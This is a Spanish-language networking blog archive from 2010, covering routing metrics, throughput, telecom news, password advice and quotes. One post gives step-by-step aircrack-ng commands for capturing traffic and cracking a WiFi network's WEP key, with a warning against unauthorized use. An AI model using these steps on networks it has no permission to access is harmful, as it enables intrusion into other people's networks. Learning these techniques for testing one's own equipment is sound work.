Distancias Administrativas por Default
Connected:           0
Static:                  1
eBGP:                 20
EIGRP (internal): 90
IGRP:               100
OSPF:              110
IS-IS:               115
RIP:                 120
EIGRP (external): 170
iBGP:               200
EIGRP summary route: 5

A veces el router debe seleccionar una ruta entre vairas que aprendió por el mismo proceso con la misma distancia administrativa. En ese caso, escoge cual tiene el menor costo hacia el destino. Cada proceso de ruteo calcula sus costos diferente y a veces se requiere manipularlos para lograr el balanceo.

Si el router recibe varias trayectorias con la misma distancia administrativa y costo hacia un destino, el balanceo de cargas puede ocurrir. El número de trayectorias usadas está limitado por el número de entradas que el protocolo de ruteo pone en la tabla de ruteo. Cuatro entradas en el default in IOS para la mayoría de los protocolos de ruteo, a excepción de BGP, donde el default es una entrada. El máximo a configurar es 6.

Los procesos de ruteo de IGRP e EIGRP también soportan trayectorias múltiples balanceo de cargas con costos distintos. Usamos el comando maximum-paths para determinar el número de rutas que puede ser instalado basado en el valor configurado en el protocolo. Si fijamos la tabla de ruteo a una entrada, se desactiva el balanceo de cargas. El proceso de balanceo entre trayectorias con costos distintos se llama varianza (variance)

Podemos usar el comando show ip route para encontrar rutas con costos iguales; en este ejemplo su salida tiene dos bloques, cada uno es una ruta. El asterisco corresponde a la ruta activa que es usada para tráfico nuevo, es decir, un único paquete o un flujo entero de datos, dependiendo del tipo de conmutación configurada.
  • Para el balanceo por process-switching, el balanceo de cargas está basado por paquete y el asterisco señala la interfase sobre la que se enviará el próximo paquete.
  • Para el balanceo por fast-switching, que es efectuado basado en los destino, el asterisco señala la interfase sobre la que se enviará el siguiente flujo de datos basados en su destino.
La posición del asterisco se mantiene rotando entre las trayectorias de costo igual cada vez que un paquete o flujo es enviado.
M2515-B# show ip route 1.0.0.0
Routing entry for 1.0.0.0/8
Known via "rip", distance 120, metric 1
Redistributing via rip
Advertised by rip (self originated)
Last update from 192.168.75.7 on Serial1, 00:00:00 ago
Routing Descriptor Blocks:
* 192.168.57.7, from 192.168.57.7, 00:00:18 ago, via Serial0
Route metric is 1, traffic share count is 1
192.168.75.7, from 192.168.75.7, 00:00:00 ago, via Serial1
Route metric is 1, traffic share count is 1

Podemos configurar el balanceo para que trabaje por destino o por paquete.

miércoles, 7 de abril de 2010

Cita

O Lord, help me to be pure, but not yet.
Oh Señor, ayúdame a ser puro, pero no todavía.
Saint Augustine (354 AD - 430 AD)

Language is the source of misunderstandings.
El lenguaje es la fuente de los malentendidos.
Antoine de Saint-Exupery (1900 - 1944)

lunes, 29 de marzo de 2010

Seguridad: fundamentos de diseño

  • Los principales objetivos del diseño de una red en cuanto seguridad, deberían ser:
  • Seguridad y mitigación de ataques basados en políticas.
  • Implementación de la seguridad a través de la infraestructura (No sólo en dispositivos especializados).
  • Admnistración y reportes asegurados.
  • Autenticación y autorización de usuarios y administradores hacia los recursos críticos de la red.
  • Detección de intrusos para recursos críticos y subnets.
  • Soporte para aplicaciones en red emergentes.

La arquitectura de red debe impedir que la mayoría de los ataques afecten exitosamente recursos de red valiosos. Los ataques logren penetrar la primera línea de defensa, o que son originados desde dentro de de la red, deben ser detectados de manera precisa y rápidamente contenidos para evitar su efecto en el resto de la red. EL buen funcionamiento de la red y la apropiada seguridad pueden y deben ser entregados al mismo tiempo.

La seguridad debe ser escalable y confiable, entendiendo que debería existir una redundancia física para protegernos contra la falla de un dispositivo, así como un error de configuración, fallas físicas, o un ataque a la red. Aunque podríamos pensar que un diseño simple podría ser mejor, los ambientes de seguridad son complejos, aunque hay algunas maneras de simplificarlos.

A veces se debe escoger entre la funcionalidad integrada en un elemento de red o un dispositivo especializado. La primera opción es atractiva porque puedes implementarla sobre equipo existente, o porque algunas características no pueden operar con el resto del dispositivo para dar un mejor rendimiento. Se usan dispositivos especializados cuando requerimos un performance muy avanzado (o un gran throughput por ejemplo) o características muy especializadas; y se debe decidir basdo en la capacidad y funcionalidad de los dispositivos contra la ventaja que presenta la integración en un elemento existente. Por ejemplo escoger entre un router de gran capacidad con características de firewall en el IOS, o un router de menor capacidad en combinación con el uso de un firewall separado. En un ambiente corporativo altamente demandante se usan dispositivos especializados por la gran carga de trabajo sobre los elementos de red.

miércoles, 24 de marzo de 2010

Cisco Carrier Routing System

Volviendo al tema del throughput, ha habido varios comentarios, preguntas, mails, sobre el asunto; y creo que debemos tenr claro que al hablar de throughput, hablamos de una capacidad de proceso, que si bien podemos estimarla o calcularla en base a tablas de los fabricantes, se refiere a la ocupación instantánea del elemento.

Por ejemplo, si tenemos un E1 de acceso a internet, tiene un ancho de banda de 2048kbps, pero usualmente el carrier utilizará 64kbps para señalización o control de ese enlace, lo que nos deja 1984kbps de ancho de banda.

Si yo descargo un archivo desde un ftp server que tiene un acceso de 128kbps, en mi router el ancho de banda disponible es de 1984kbps, y el throughput que alcanzo es de 128kbps por factores externos, pero sigo teniendo el mismo ancho de banda disponible.

Ahora, pensemos en un router de core utilizado por un carrier; tiene una capacidad de procesar y darle servicio de enrutamiento a una cantidad de tráfico impresionante, por ejemplo la plataforma CRS-3 alcanza un throughput de 322 Terabits por segundo, eso es su capacidad total, utilizando todas las interfases, y si en un determinado momento eso llegara a significar que tomaría tráfico de sólo dos interfases, pues así sería, es el máximo de procesamiento que puede alcanzar; pero es muy diferente a decir, en este momento el throughput de mi equipo es de x cantidad, ya que este es un límite de proceso, y el ancho de banda es un límite de transporte generalmente.

Pueden consultar las tablas de throughput por plataforma aquí:

cisco.com

25 años de dominios .com

EL 15 de marzo de 1985 la empresa Symbolics registró su dominio .com y comenzó a escribir en las páginas de esta historia que todos hemos contruido. Esta empresa se dedicaba en aquellos días a la fabricación de computadoras y hoy sigue vigente aunque fue vendida, y podemos leer su historia en la wikipedia, y tienen una página sobre el aniversario aquí.

http://www.25yearsof.com/

El registro de dominios y posterior crecimiento de la web y del internet[working] ha cambiado mucho nuestra vida; desde el hecho de poder compartir nuestros conocimientos en un blog, en wikipedia, o hacer consultas sobre lo que otros piensan; o la manera en la que nos comunicamos con amigos, clientes, proveedores; la manera en que se mueve el dinero y en que las relaciones humanas, de negocios y privadas, se establecen.

Celebremos pues los primeros 25 años del primer dominio .com

martes, 23 de marzo de 2010

cita

The man of knowledge must be able not only to love his enemies but also to hate his friends.
El hombre de sabiduría debe ser capaz no sólo de amar a sus enemigos, sino también de odiar a sus amigos.
- Friedrich Nietzsche

viernes, 19 de marzo de 2010

¿Cómo obtener la clave WEP de una red WiFi?

Me encontré este tutorial en video que describe de manera bastante simple como hacer una captura de paquetes en la interfase inalámbrica usando una versión de Linux llamada BackTrack, lo malo del video es que no describe con gran detalle que es lo que está uno haciendo para lograrlo, y el objetivo creo que debería ser aprender, no recomiendo que usen este conocimiento para entrar a redes a las que no tienen autorización de entrar.
Remember, with great power. comes great responsibility.
Yo hice la prueba con mi MODEM-router 2Wire y funcionó después de unas 2 horas; después del video están las instrucciones por escrito.



Si no queremos instalar el Backtrack en una partición del disco duro, reiniciamos la computadora que pretendemos usar y en el menú del BIOS verificamos que podemos arrancar la computadora desde un puerto USB.
Posteriormente descargamos la imagen ISO del sistema operativo Backtrack, y descargamos la herramienta UNetBootin, que nos va a servir para instalar el backtrack en un flash drive (pen drive, o memoria USB). El fash drive debe estar formateado en FAT o FAT32 para que podamos usarlo como arranque. Ejecutamos el UNetBootin y seleccionamos la imagen ISO y el Flash Drive deseados, completamos el proceso de instalación y reiniciamos la computadora para utilizar la nueva imagen.

Una vez que termine de cargar vamos a escribir para iniciar la interfase gráfica:
startx
Abrimos una consola e iniciamos los servicios de red:
/etc/init.d/networking start
aquí es donde inicia el trabajo sobre la red con la herramienta airmon-ng, primero vemos el status de nuestra tarjeta de red, que usualmente es wlan0, y después vamos a detenerla para iniciar la interfase virtual creada, usualmente mon0 y verificamos el status nuevamente:
airmon-ng
airmon-ng stop [wlan0]
airmon-ng start [mon0]
airmon-ng
Ahora vamos a iniciar la captura de paquetes desde la interfase con airodump-ng, pero primero vamos a ver todas las redes que se pueden detectar y cual tiene un cifrado WEP, posteriormente lo detemos (ctrl+C) e iniciamos nuevamente la herramienta para capturar paquetes (el bssid de la red es la dirección MAC asociada a la red o el access-point):
airodump-ng [mon0]
ctrl C
airodump-ng -w wep -c [channel number] --bssid [bssid number] [mon0]
Abrimos una segunda consola y usando la herramienta aireplay-ng vamos a asociar nuestra tarjeta wireless al access-point deseado; después de este comando debemos tener un mensaje de que la asociación fue exitosa y no volvemos a moverle:
aireplay-ng -1 0 -a [bssid] [mon0]
Abrimos una tercera consola y vamos a inyectar paquetes a esa MAC address, y vamos a estar capturando las respuestas con el airodump-ng que está activo en la primera consola y vamos a ver que se capturen al menos 30,000 paquetes (unas 2 o 3 horas, dependiendo de que tan buena señal tenemos de la red):
aireplay-ng -3 -b [bssid] [mon0]
Y después de unas dos horas vamos a la 1a consola a ver si tenemos los 30mil paquetes o más y de ser así detenemos la captura, pedimos el directorio y ejecutamos aircrack-ng que es la herramienta que decodifica la clave WEP y la escribimos;
control C
dir
aircrack-ng [filename].cap (usualmente es wep-01.cap)
Escribimos la clave que nos proporciona la herramienta y listo, ya tenemos el ID de la red y la clave WEP.

Copa del Mundo FIFA

Este es un calendario que hice con los partidos de la copa del mundo, pueden agregarlo con XML, iCAL o HTML, y hay un mapa con las ciudades donde se jugarán los partidos, para ver el contenido da click en más información:

jueves, 18 de marzo de 2010

Ancho de Banda y Throughput (2)

Recibí un correo de Kevin preguntando sobre la diferencia entre throughput y bandwidth porque mencioné en otro post que un 1841 no puede alcanzar más que 75Mbps (un error, son 38.4Mbps o 75mil paquetes por segundo) de throughput a pesar de tener interfases Fast Ethernet.

Hay un documento llamado Portable Product Sheets - Routing Performance donde podemos consultar cual es la capacidad de proceso de cada plataforma, ya sea con el process switching o con el CEF switching (Cisco Express Forwarding).

La principal diferencia entre el Throughput y el Bandwidth es que un enlace tiene un ancho de banda de 100Mbps, pero en el caso de un router 1841 por ejemplo, la capacidad de proceso se ve limitada por el número de paquetes que puede procesar (75mil paquetes por segundo) o el ancho de banda total (38.4Mbps), el MTU máximo es de 1500 bytes (ó 12000 bits), incluyendo los encabezados y la carga "útil", lo cual serían aproximandamente 3200 paquetes; y la razón por la que no es igual la capacidad de proceso de paquetes y el ancho de banda es que no todos los paquetes son del tamaño máximo permitido, hay por ejemplo paquetes de acknowledge, de SYN, y echo requests ,echo replies, etc, que son de tamaños mucho menores, pero que ocupan la memoria de nuestro router, y por tanto podrían alcanzar la capacidad máxima de 75mil paquetes y saturar el router sin llegar a la capacidad de 38.4Mbps.

Al final, la utilización de ese ancho de banda disponible (100Mbps en fast ethernet) está limitada por los recursos de proceso (38.4Mbps o 75,000pps) y el throughput representa esa utilización.

Cada router está pensado para una capacidad que viene relacionada con los enlaces WAN que puede manejar; el 1841 está recomendado para un E1 o menos, por lo que, en teoría, debería procesar hasta 2048Kbps provenientes de la LAN y que pasarán por el para entrar a la WAN, por eso su throughput o capacidad de proceso es menor a 100Mbps, y cabe destacar que hablamos de una capacidad total a ser procesada, no es como en una interfase full duplex que tiene 100Mbps de entrada y 100 de salida; en el caso del throughput, el router puede procesar un cierto número de paquetes a los que les dará el servicio de ruteo entre sus interfases, y que puede bajar en el caso de routers que ejecutan ruteos dinámicos, servicios de gateway de voz o de seguridad, ya que el CPU está ejecutando procesos más elaborados sobre cada paquete.

Si queremos conectar un E3 (34Mbps) en un router, usaremos un 3845 que tiene una capacidad de 500,000pps o 256Mbps; el throughput es mucho mayor.

jueves, 4 de marzo de 2010

AXTEL lanza “AXTEL Conmigo”

  • Es un innovador servicio que da movilidad a sus líneas de hogar y negocio
  • Funciona a través de internet de banda ancha, WiFi y 3G

Monterrey, N.L., a 3 de marzo de 2010.- AXTEL, S.A.B. de C.V. (BMV: AXTELCPO; OTC: AXTLY) (“AXTEL”), empresa mexicana de telecomunicaciones, anunció el lanzamiento de su servicio de voz sobre internet “AXTEL Conmigo”, gracias al cual sus clientes podrán hacer y recibir llamadas de su línea AXTEL a través de dispositivos móviles y computadoras personales.

Este innovador servicio, el primero en su tipo ofrecido por una empresa telefónica de México, permite a los clientes de AXTEL darle movilidad a la línea telefónica de su hogar o negocio, con todas las funcionalidades y beneficios del paquete comercial que hayan contratado.

“AXTEL Conmigo” opera en dispositivos móviles como teléfonos inteligentes (smartphones) o computadoras personales, en cualquier lugar de México o del mundo con acceso a Internet de banda ancha, incluido WiFi o 3G.

La segunda empresa de telefonía fija más grande del País explicó que “AXTEL Conmigo” ya está disponible para sus clientes a través de su portal www.axtelconmigo.com.mx, donde pueden descargar gratuitamente el software (softphone) requerido tanto en computadoras como en dispositivos móviles; para el caso de iPhone, el software puede obtenerse directamente en el dispositivo a través de su App Store.

“AXTEL Conmigo forma parte de la nueva generación de servicios que hemos diseñado para revolucionar la experiencia de comunicación de nuestros clientes. Estamos maximizando el valor de nuestra oferta a través de soluciones innovadoras que materializan las bondades de la convergencia tecnológica” dijo Iván Alonso, Director Ejecutivo de Innovación y Tecnología.

miércoles, 17 de febrero de 2010

1Gbps por fibra en casa provisto por Google.

Bueno, en nuestro mercado residencial la competencia está alrededor de 10Mbps de acceso a Internet, ¿qué tal 1Gbps por fibra? Google va a instalar en algunas comunidades una red de fibra para efectuar un experimento sobre nuevas tecnologías y maneras de instalar y operar la red, por la descripción del proyecto parece ser una red de acceso, dejando abierta la posibilidad de escoger el ISP.



Este experimento se suma al existe de GoogleWifi que esá operando en Mountain View, donde implementaron una red inalámbrica para toda la ciudad.

Hace algunos días Telefónica lanzó la posibilidad de cobrarle a los buscadores por el uso de su red, algo que en principio me parece un poco absurdo; además Netflix sugiere que los ISPs tienen ventajas sobre la situación al poder censurar ciertos contenidos dentro de sus redes; y vemos este tipo de experimentos que apuntan hacia la neutralidad de la red de redes.

Creo que es la preparación para una guerra que no ha sido declara entre las empresas de contenidos o búsquedas y los proveedores de Internet. Antes de que el fin de esa neutralidad amenace su posición, Google está desarrollando opciones para mantener las redes abiertas, o mostrar que en un futuro parte de la tecnología usada para entregar internet en los hogares será de su propiedad, y por tanto de su control, equilibrando un poco la batalla sobre el control de contenidos en las redes.

martes, 16 de febrero de 2010

Fiber To The Home de Axtel (FTTH)

Se trata de un nuevo acceso de Axtel para la entrega de servicios residenciales, que podrían ser telefonía, Internet y televisión o diversos contenidos. Su capacidad llega hasta los 100Mbps y se entrega a través de fibra óptica, siendo una tecnología robusta y probada ampliamente, ya que actualmente varios carriers la usan en Estados Unidos, Corea, Japón, Alemania, etc, Verizon por ejemplo.
Actualmente está en marcha el piloto en Monterrey y Garza García para hacer el ajuste fino de la red de Axtel

miércoles, 27 de enero de 2010

Inicia SCT proceso para adjudicar fibra oscura de CFE

Comunicado 012
Secretaría de Comunicaciones y Transportes
Ciudad de México


La SCT inició el proceso para arrendar un par de hilos de fibra oscura de la CFE para transporte interurbano por 20 años, con opción a prórroga por 10 años más.

Son 295 segmentos que hacen un total de 21,208Km de fibra establecidos en 3 rutas, con opción a crecer los segmentos de fibra contratando a CFE con un precio de $17,825USD por kilómetro de tendido:
  • Ruta 1: Pacífico (valor mínimo 358.1millones de pesos). Se extiende con diversos ramales por el poniente del país; va de Baja California a Oaxaca, e incluye dos tramos no conectados con resto del país, en Baja California y Baja California Sur.
  • Ruta 2: Centro (valor mínimo 255.3millones de pesos). Cruza el país de norte a sur por el centro; va de Chihuahua a Chiapas y tendrá acceso a Guatemala por Tapachula.
  • Ruta 3: Golfo (valor mínimo 245.2millones de pesos). Corre el país por el lado oriente; tiene dos salidas a la frontera norte, por Nuevo León y Tamaulipas, y llega a la Península de Yucatán, con salida al cable submarino que conecta a Florida.

lunes, 25 de enero de 2010

MusicDNA el nuevo formato multimedia

Como en las películas: de los creadores del MP3, de los productores del formato que cambió la industria de la música, llega esta nueva aventura multimedia a revolucionar los contenidos digitales.

MusicDNA es un nuevo formato que combina audio con metadatos como análisis de audio, anotaciones manuales, inteligencia de negocio, y casi cualquier tipo de multimedia.

Esta característica le permite a un archivo tener más descriptores que un archivo convencional, pudiendo etiquetar el contenido conel tiempo, instrumentación, ambiente, color etc; con lo que las posibilidades de búsqueda e indexación para playlists crecen.

MusicDNA2.png

http://www.musicdna.com/

cita (quote)

"Whatever is worth doing at all is worth doing well."
"Cualquier cosa que valga la pena hacerse, vale la pena hacerse bien.
Lord Chesterfield

Posted via email from lespejel's posterous

domingo, 24 de enero de 2010

EASEUS Partition Master pro 4.1.1

Pueden descargar el EASEUS Partition Master pro 4.1.1 gratis hasta el 1o de Febrero.
Es una herramienta muy útil que creo que todos deberíamos tener, nunca se sabe cuando nos hará falta algo así para trabajar en uno de nuestros discos duros.

Descárgala aquí:
http://www.partition-tool.com/giveaways/epmpro/

viernes, 22 de enero de 2010

¿Cómo construir un password seguro?

En Byte Podcast encontré un artículo sobre cómo construir un password seguro para cada sitio, y quisiera darles algunas consideraciones adicionales y consejos que he adquirido de los distintos trabajos. Esto es muy importante porque si les hablo de como funciona una red, debemos tener en cuenta que el usuario es casi siempre el eslabón de seguridad más débil, nosotros a veces hacemos malas elecciones de contraseñas o tenemos costumbres que pueden comprometer la seguridad de nuestros datos o de la empresa donde trabajamos. Por ejemplo, quienes hacemos home office y tenemos acceso a redes seguras, si dejáramos un post it con el password, no sólo ponemos en peligro nuestra computadora e identidad, sino el acceso a toda la red corporativa.

Primero que nada, debemos considerar que el password tenga al menos 8 caracteres, al menos un número, al menos dos letras, mayúsculas, minúsculas y un caracter especial.

No debemos usar nombres, cumpleaños, aniversarios, nombres de software, palabras comunes, personajes, y en la medida de lo posible, no usar palabras, ya que hay métodos para atacar los passwords que se basan en diccionarios; por eso no es recomendable usar datos personales, lo primero que se prueba es la fecha de cumpleaños

Un consejo útil es usar frases como guía para construir passwords, por ejemplo, escogemos el nombre de una canción o frase, una persona a la que queremos, y algún número significativo:

La tumba de villa está en Chihuahua + Doroteo Arango 1923

Y construimos el password con la primera letra de cada palabra, usando caracteres especiales para unir las ideas:

ltdV@C+DA1923

Como verán, este password tiene más de 8 caracteres, tiene todo lo que requerimos y no es una palabra que pueda ser encontrada en un diccionario de passwords.

Otros ejemplos:

a las 7 am me encanta caminar sobre la arena
al7aMMec/la

mi hermana se llama Adriana, y sus 4 hijos son mis sobrinos

mhslA,ys4hsms

Ahora, aquí la idea es utilizar frases o ideas que son signficativas para nosotros, o que nos gustan o nos han impactado, combinarlas con otra idea y generar el password, y atendiendo a la recomendación de no usar información personal, ya que por ejemplo, yo no tengo 4 sobrinos.

No me ayudes, así no me estorbas - Eulalio González
Nma,anme-3G

Espero que estos consejos les ayuden a construir sus passwords seguros, y recuerden que una vez que tengamos ese password:
  • debemos memorizarlo
  • no debemos escribirlo, compartirlo o decirlo a nadie
  • tratemos de usar má de 8 caracteres
  • no usemos el mismo password para todos los sitios, contruyan variantes (ver el video de bytepodcast)

cita

The world's as ugly as sin, and almost as delightful.
El mundo es tan feo como el pecado, y casi tan delicioso
Frederick Locker-Lampson

jueves, 7 de enero de 2010

Comunicaciones Unificadas

Anteriormente les hablé un poco sobre cloud computing y realicé una comparación del rendimiento entre diferentes servicios de Internet, todo esto orientado a lo que es la nueva tendencia de compra de servicios con una inversión mínima en infraestructura.

Pensemos ahora en la disponibilidad de un empleado. Generalmente para desarrollar un trabajo debemos transladarnos al sitio de trabajo, ubicarnos en nuestro escritorio, usar nuestra computadora y conectarnos a los softwares de gestión de recursos o cualquier otra herramienta informática que usemos para trabajar; entre ellas, nuestro teléfono del trabajo y el correo.

Desde hace algunos años, Cisco ha tenido la tendencia de que sus empleados, en la medida de lo posible, hagan Home Office, es decir, que sin tener que transladarse al lugar físico de trabajo, puedan desarrollar su empleo, y todo ésto con el objetivo de lograr ahorros. Ahora, ¿dónde vemos esos ahorros?; las oficinas no tienen que ser tan grandes, la refrigeración de los espacios es más barata, se requiere menor iluminación, requerimos una LAN menor, se consume menos gasolina en el caso de vehículos de la compañía, se tiene una mejor calidad de vida como empleado y en consecuencia, rendimos más.

En mi caso tengo la fortuna de vivir muy cerca de mi trabajo, algo que busqué y que aprecio, y puedo venir caminando a trabajar, y también tengo la fortuna de tener herramientas de home office, y ¿cómo logramos que la oficina vaya a la casa?, con Comunicaciones Unificadas.

El concepto de Comunicaciones Unificadas es contar con una herramienta informática que agrupe mensajería instantánea, correo electrónico, colaboración y telefonía en una solución. Dicha solución puede ser implementada por diferentes marcas como Cisco, Avaya, Nortel, Microsoft, etc. y se hace integrando servidores de correo, con servicios de mensajería instantánea y PBX's que sean capaces de integrarse a las bases de datos existentes de usuarios corporativos.

Todo esto es un poco complejo de implementar y administrar, y si la compañía no tiene un tamaño considerable, no se justifica la contratación de personal especializado en dichas soluciones, ya que involucra una inversiones en sueldos, equipo, licencias, etc.

Por eso, regresando al cloud computing, los proveedores de servicio ofrecen comunicaciones unificadas,dando acceso a servidores de correo, gateways de telefonía y de mensajería instantánea por una renta fija, siendo un servicio que puede deducirse fiscalmente, y sin la necesidad de hacer inversiones en infraestructura, licencias o administración.

Todos esos servicios se contienen dentro de un producto como solución única; contratamos el número de usuarios deseados y gozamos de las terminales móviles (laptops, netbooks, PDA's, etc) con los servicios de la oficina implementados.

Ahora, si tengo en mi laptop la extensión telefónica, necesito en casa un proveedor de Internet que presente parámetros de latencia y jitter bajos, para que la voz funcione; ahí la importancia de conocer el rendimiento de distintos proveedores, ya que en aplicaciones de este tipo no importa tanto el ancho de banda, sino la calidad del enlace.

Ahora si, teniendo un router seguro en casa que pueda hacer VPN,  o un cliente deVPN instalado en laptop, podemos conectarnos a los sistemas de la oficina, e independientemente de ese túnel seguro, tenemos otra solución segura de mensajería instantánea, telefonía y video (sametime, office communicator, etc), herramientas de colaboración (como live meeting, webex, meeting place, log me in, etc); y correo electrónico.

Esta solución es vendida ya por Axtel, que de hecho la usa en su organización de más de 5mil empleados, por lo que ya hay una madurez en el desarrollo de la solución. Les recomiendo visitar el sitio y leer un poco más de lo que ellos ofrecen como Axtel UniCo (unified communications).

miércoles, 6 de enero de 2010

cita

In theory, there is no difference between theory and practice; In practice, there is.
En teoría, no hay diferencia entre la teoría y la práctica; en la Práctica, si la hay.
Chuck Reid

martes, 5 de enero de 2010

Rendimiento de un Proveedor de Servicios (ISP)

Creo que este ejercicio es bueno para comparar el rendimiento de los servicios, no sólo que te den el ancho de banda que contratas, sino que el rendimiento de tu servicio soportará aplicaciones multimedia, como VoIP, Skype, jugar en línea con tu consola, videoconferencias o llamadas con tu Live Messenger, etc.

Dichas aplicaciones son sensibles a latencias altas (ping) y al jitter (variación en la latencia).

Para ver los resultados de un Internet Dedicado, uno por wimax y algunos DSL; continúa leyendo:

Internet Dedicado Axtel (desde la Ciudad de México a través de MPLS hacia Monterrey 201.153.12.x)





lunes, 4 de enero de 2010

domingo, 3 de enero de 2010

AT&T demandada por Washington DC

Me encontré esté post en Engadget.com y me pareció interesante ya que podría sentar un precedente:

Resulta que el Distrito de Columbia está demandando a AT&T por "las sobras" de las tarjetas telefónicas. Sopongamos que compras una tarjeta de prepago para llamar, y quedan 5 o 10 centavos de dolar que decides no gastar. Usualmente la empresa incluía la suma de todos los saldos restantes que no eran consumidos como si fuera un bono a ganar.

El alegato aquí es que el fiscal general del Distrito de Columbia busca que se declare como propiedad no reclamada, lo que obligaría a que después de 3 años ese dinero no reclamado debería ser entregado al estado. Básicamente estarán peleando por el status legal de propiedad de ese dinero y sin duda será un precedente para la industria de prepago.